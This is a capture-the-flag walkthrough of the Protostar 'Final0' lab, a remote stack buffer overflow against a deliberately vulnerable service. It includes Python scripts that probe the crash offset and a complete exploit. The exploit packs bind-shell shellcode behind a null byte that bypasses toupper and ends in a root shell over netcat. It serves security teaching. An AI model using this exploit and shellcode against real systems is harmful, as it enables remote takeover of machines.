Protostar 0x15 - Final0

In these final levels, we'll be remotely implementing the exploits we've worked with previously, starting with a remote stack buffer overflow.



The beginning of "main" looks similar to the Net exercises we worked on, so we know it will function the same. If we use netstat, we can see that this level's port (defined in the source code as "2995") is listening:


$ netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
...
tcp        0      0 *:2994                  *:*                     LISTEN
tcp        0      0 *:2995                  *:*                     LISTEN
tcp        0      0 *:2996                  *:*                     LISTEN


Now, let's check the code for this "get_username" function so we can understand our objective. First, it creates a buffer, initializes it with zeroes using memset, and then calls "gets" to request user input to write to the buffer. Then, newline characters are converted to zeroes, the case is converted to uppercase via toupper, and a duplicate of the string (obtained via strdup) is returned to "main." Finally, regardless of what we enter, "main" rejects our buffer and prints it back to us.

The overall objective is simple: think back to our Stack5 exercise. We will need to overflow our buffer, overwrite the saved return address of "get_username," and return into our buffer (or into the area just past the overwritten return address), which will contain some shellcode.

However, we have to do all of this "remotely" using sockets. So, although we may be tempted to start by debugging in gdb, we know that the stack has a tendency to vary between gdb and normal execution. Instead, let's first see if we can cleverly deduce the offset of the return address from our buffer through regular input to the function.

We'll first create a program that allows us to properly communicate with the server:


import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 2995))

buffer = "A" * 4
buffer += "\n"
s.send(buffer)

response = s.recv(1024)
print response


The one key difference from the Net exercises we did is the use of "gets" instead of "fread." If we check the man page for "gets," we see that it "reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF." So, to let the program know we've finished sending our input, we need to end it with a newline "\n" character, which is why the script appends one to the buffer.

If we run this program, we see:


$ python final0.py
No such user AAAA


It works! Now, how can we use this to determine the offset of the return address?

Well, we know that values stored on the stack are 32-bit aligned, so what if we craft a loop that keeps adding 4 bytes of input? Eventually, we will corrupt the saved ebp, which crashes the program, but not before the call to "printf." We know this from disassembling "main" in gdb and noticing that, after "get_username" returns, it addresses the stack through offsets of esp and not ebp:


(gdb) disas main
Dump of assembler code for function main:
0x08049833 <main+0>:    push   %ebp
...
0x08049874 <main+65>:   call   0x804975a <get_username>
0x08049879 <main+70>:   mov    %eax,0x1c(%esp)
0x0804987d <main+74>:   mov    $0x8049c7b,%eax
0x08049882 <main+79>:   mov    0x1c(%esp),%edx
0x08049886 <main+83>:   mov    %edx,0x4(%esp)
0x0804988a <main+87>:   mov    %eax,(%esp)
0x0804988d <main+90>:   call   0x8048bac <printf@plt>


Then, if we add another 4 bytes to the string that just overwrote the saved ebp, we should hit the saved return address which will generate a second crash and this time it won't get to the "printf."

So, we will create a loop which continuously adds 4 bytes of input, and then checks to see whether we receive the "printf" string "No such user..." Once we do not receive that string, we know that we've overwritten the saved return address and thus eip. Then, if we check the /tmp directory, we'll find two core dumps: one from when we overwrote the saved ebp, and a newer one from when we overwrote the saved return address.

Let's first enable core dumps. Note that, although this feels like cheating, it's an optional step that will allow us to confirm our above thinking. In real practice, we would simply assume the above to be true and proceed "blindly" until we reach a point that might indicate otherwise.


$ su root
Password:
No directory, logging in with HOME=/
root@protostar:/# ulimit -c unlimited


And now, we can craft our script:


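import socket
import time

i = 0

while True:
        time.sleep(.1)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('localhost', 2995))

        # 512 As fill the buffer; the Bs probe whatever lies beyond it
        buffer = "A" * 512
        buffer += "B" * (i * 4)
        buffer += "\n"
        s.send(buffer)

        response = s.recv(1024)
        print response

        print "offset is %d" % (i * 4)

        # No "No such user" reply means the server crashed before "printf"
        if response[:2] != "No":
                break

        # Grow the probe by one 4-byte stack slot for the next attempt
        i += 1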


Our "while" loop, in order, does this:
  1. Waits a short duration (for visibility purposes while we watch it run)
  2. Connects to the level's server
  3. Crafts a buffer which is 512 As, plus some Bs which are a growing multiple of 4
  4. Appends a newline "\n" character which will convert to a null-terminator
  5. Sends the buffer
  6. Receives and prints the response
  7. Prints the current number of Bs sent (or in other words, the current offset from the end of our 512-byte buffer)
  8. Checks the server response, and if the first two characters are not "No," it breaks

Thus, as explained before, once the loop exits we will have two core dumps: one from when ebp was overwritten, and one from when eip was overwritten.
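The probing logic can also be separated from the networking so that it is easy to reason about. The following is a minimal sketch, written for Python 3 with byte strings (unlike the Python 2 scripts in this walkthrough). The names "find_crash_offset," "tcp_probe," and "fake_server" are hypothetical helpers introduced here for illustration, and "fake_server" only imitates the behavior observed in this write-up (replies stop once 20 extra bytes are sent).

```python
import socket


def find_crash_offset(send_probe, buffer_size=512, step=4, max_extra=256):
    """Grow the input by `step` bytes until the "No such user" reply disappears.

    `send_probe` is any callable that takes the payload bytes and returns
    the server's reply as bytes (empty if nothing came back).
    """
    extra = 0
    while extra <= max_extra:
        payload = b"A" * buffer_size + b"B" * extra + b"\n"
        response = send_probe(payload)
        if not response.startswith(b"No"):
            return extra          # first size at which the reply is missing
        extra += step
    return None                   # never crashed within max_extra bytes


def tcp_probe(payload, host="localhost", port=2995):
    """Send one probe to the level's port and return whatever comes back."""
    with socket.create_connection((host, port)) as conn:
        conn.sendall(payload)
        try:
            return conn.recv(1024)
        except OSError:
            return b""            # connection died before a reply arrived


def fake_server(payload):
    """Stand-in for the real service, assuming the behavior seen in this post."""
    sent = len(payload) - 1       # the trailing newline is not stored
    return b"No such user" if sent < 532 else b""


print(find_crash_offset(fake_server))   # prints 20 with the stand-in above
```

Against the real service, the call would be find_crash_offset(tcp_probe). Passing the transport in as a function keeps the search loop testable without a running server.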


$ python final0.py
...

No such user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

offset is 16

offset is 20


Just as expected, the final input (in which we printed "offset is 20") did not receive a "printf" from the server. This means that we must've overwritten eip! If we check the /tmp directory, we find our two core files:


$ ls
core.4.final0.8995  core.4.final0.8996  final0.py


Great! Everything appears to work as expected. Now, we could examine this core file if we wanted to, but that requires root access which, again, feels a bit like cheating. Let's instead use gdb as "user" with the understanding that the stack will likely be located elsewhere.

Since "main" is going to fork the process, we'll break at the start of "main" so that the registers are initialized, and then set eip to the start of "get_username." Then, we will break on the "ret" instruction at the end of "get_username" and check esp to see where on the stack the saved return address is stored.


$ gdb /opt/protostar/bin/final0
GNU gdb (GDB) 7.0.1-debian
...
Reading symbols from /opt/protostar/bin/final0...done.
(gdb) break *main
Breakpoint 1 at 0x8049833: file final0/final0.c, line 37.
(gdb) disas get_username
Dump of assembler code for function get_username:
0x0804975a <get_username+0>:    push   %ebp
...
0x08049832 <get_username+216>:  ret
(gdb) break *0x08049832
Breakpoint 2 at 0x8049832: file final0/final0.c, line 34.
(gdb) set $eip = 0x0804975a
(gdb) c
Continuing.
AAAA
Breakpoint 2, 0x08049832 in get_username () at final0/final0.c:34
34      in final0/final0.c
(gdb) x/i $eip
0x8049832 <get_username+216>:   ret
(gdb) x/x $esp
0xbffff7cc:     0xb7eadc76


Now, we have a rough idea of where to start, though "rough" is certainly the keyword. Let's use a method similar to our final method from our Stack5 solution in order to give us the highest probability of locating our shellcode:

  1. We will fill the initial buffer (512 bytes plus the 20 bytes before the saved return address) with a giant NOP slide, followed by some shellcode
  2. Then, we'll provide 4 bytes to overwrite the saved return address with a stack address that we guess
  3. We'll have yet another giant NOP slide, followed by the same shellcode

The double shellcode injection will give us a much higher probability of success! But before we begin crafting the Python script, we need to remember the "toupper" function. How will that affect us? Well, we can't use any bytes that correspond to lowercase ASCII characters (0x61 through 0x7a), or else they'll be altered. So, we should craft some shellcode that doesn't use these characters, right?

Sure, we could do that. Or, we could examine the source code more closely:


The loop that calls "toupper" iterates over our input buffer for as long as "i < strlen(buffer)." If we check the man page for "strlen," we see that it calculates the length of the string excluding the terminating null byte, meaning that it stops counting at the first null byte it finds. However, we provide our string via "gets," which we know from earlier only stops at a newline or EOF and is not concerned with null bytes. So, to avoid the "toupper" issue entirely, we can begin our string with a null byte! "strlen" then reports a length of 0, and the loop never touches our input.

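To see the effect of the leading null byte, here is a small Python 3 model of a loop bounded by "strlen." It is only a sketch of the behavior described above, not the level's actual C code, and "toupper_loop" is a hypothetical name introduced for illustration. The sample bytes are the first three bytes of the shellcode used later in this post.

```python
def toupper_loop(buf):
    """Model of a C loop that uppercases buf[i] while i < strlen(buf)."""
    end = buf.find(b"\x00")
    length = len(buf) if end == -1 else end   # what strlen() would report
    # bytes.upper() only changes ASCII 'a'..'z', like toupper in the C locale
    return buf[:length].upper() + buf[length:]


sample = b"\x6a\x66\x58"                      # 0x6a is 'j', 0x66 is 'f'

# Without protection, the two lowercase bytes are rewritten
print(toupper_loop(sample))                   # b'JFX'

# With a leading null byte, strlen() is 0 and nothing is modified
print(toupper_loop(b"\x00" + sample) == b"\x00" + sample)   # True
```

The same model shows that only the bytes before the first null are at risk, so a single null byte at the very start of the input protects everything after it.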
Now, the final question: which shellcode should we use? For this exploit, we'll inject a shellcode that binds a shell to an available port, and listens for connections. This will allow us to connect and interact with the shell at our leisure!

If you search for "TCP shell bind" you should be able to find something suitable. I used this code from shell-storm provided by Julien Ahrens.

Here is our final Python script. Note that it is extremely verbose, but that is done intentionally for clarity purposes:



import socket
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 2995))

shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89" \
        "\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66" \
        "\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3" \
        "\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89" \
        "\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79" \
        "\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89" \
        "\xe3\x41\x89\xca\xcd\x80"

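# A leading null byte makes strlen() return 0, so the toupper loop never runs
stop_toupper = "\x00"
# First NOP slide, sized so that new_ret lands at offset 532 (512 + 20)
NOP_1 = "\x90" * (532 - len(shellcode) - len(stop_toupper) - 32)
padding = "\x41" * 32
# Guessed stack address, packed as a little-endian 32-bit value
new_ret = struct.pack("<I", 0xbffffb00)
NOP_2 = "\x90" * 100
# gets() stops reading at the newline
end = "\n"

payload = stop_toupper + NOP_1 + shellcode + padding + new_ret + NOP_2 + shellcode + end
s.send(payload)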

s.close()


To break it down, here is the structure of our payload:
  1. A null byte, which tricks "toupper's" loop into thinking our string is 0 bytes long, bypassing "toupper" entirely
  2. A NOP slide
  3. Our shellcode
  4. Some padding, in case any local variables between the end of our buffer and the saved return address are overwritten
  5. The new return address, which we hope is somewhere in one of our two NOP slides
  6. A second NOP slide
  7. A second copy of our shellcode
  8. A newline character to tell "gets" that we are done with our input
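
The layout above can be checked mechanically before anything is sent. The sketch below is a Python 3 rewrite under stated assumptions: "build_payload" and "RET_OFFSET" are hypothetical names introduced here, and the 16 bytes of 0xcc are a placeholder standing in for real shellcode. It confirms that the guessed address lands exactly at offset 532 and that no stray newline would cut the input short in "gets."

```python
import struct

RET_OFFSET = 512 + 20   # buffer size plus the 20 bytes found by probing


def build_payload(shellcode, ret_addr, pad_len=32, sled2_len=100):
    """Assemble: null byte, NOPs, shellcode, padding, address, NOPs, shellcode."""
    prefix = b"\x00"                                   # stops the toupper loop
    sled1_len = RET_OFFSET - len(prefix) - len(shellcode) - pad_len
    if sled1_len < 0:
        raise ValueError("shellcode does not fit before the return address")
    body = (prefix
            + b"\x90" * sled1_len
            + shellcode
            + b"A" * pad_len
            + struct.pack("<I", ret_addr)              # little-endian address
            + b"\x90" * sled2_len
            + shellcode)
    if b"\n" in body:
        raise ValueError("payload contains a newline; gets would stop there")
    return body + b"\n"                                # newline ends the input


# Placeholder shellcode (assumption): 16 breakpoint bytes, not a real payload
demo = build_payload(b"\xcc" * 16, 0xbffffb00)
print(demo[RET_OFFSET:RET_OFFSET + 4])                 # b'\x00\xfb\xff\xbf'
```

Note that the packed address itself contains a null byte, which is harmless here because "gets" only stops at a newline or EOF.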

Is using two shellcodes overkill? Absolutely. However, running it for the first time, we can see that it worked without us needing to make tweaks:


$ python final.py
$ netstat -lt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address     Foreign Address    State
tcp        0      0 *:41708           *:*                LISTEN
...
tcp        0      0 *:1337            *:*                LISTEN
...


Our port is ready and waiting for us! If we attempt to connect to it from another machine, we're in:

$ nc 192.168.172.2 1337
whoami
root


Terrific!